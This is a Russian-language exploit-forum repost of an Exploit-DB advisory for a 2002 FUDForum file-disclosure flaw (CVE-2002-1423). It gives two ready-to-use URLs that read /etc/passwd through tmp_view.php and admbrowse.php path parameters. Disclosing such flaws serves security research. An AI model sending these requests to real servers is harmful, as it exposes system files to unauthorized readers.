Exploit Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 - File Disclosure

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21723
Проверка EDB
  1. Пройдено
Автор
ULF HARNHAMMAR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2002-1423
Дата публикации
2002-08-19
Код: 
source: https://www.securityfocus.com/bid/5501/info

Reportedly, FUDForum may disclose contents of arbitrary files to attackers. The vulnerability is the result of FUDForum failing to check the path of the file that is being requested. By simply making malicious requests via URI parameters, an attacker is able to obtain access to potentially sensitive files.

http://victimhost.com/tmp_view.php?file=/etc/passwd
http://victimhost.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 - File Modification
Ответы
0
Просмотры
300
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit FUDforum - Multiple Remote PHP Code Injection Vulnerabilities
Ответы
0
Просмотры
382
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу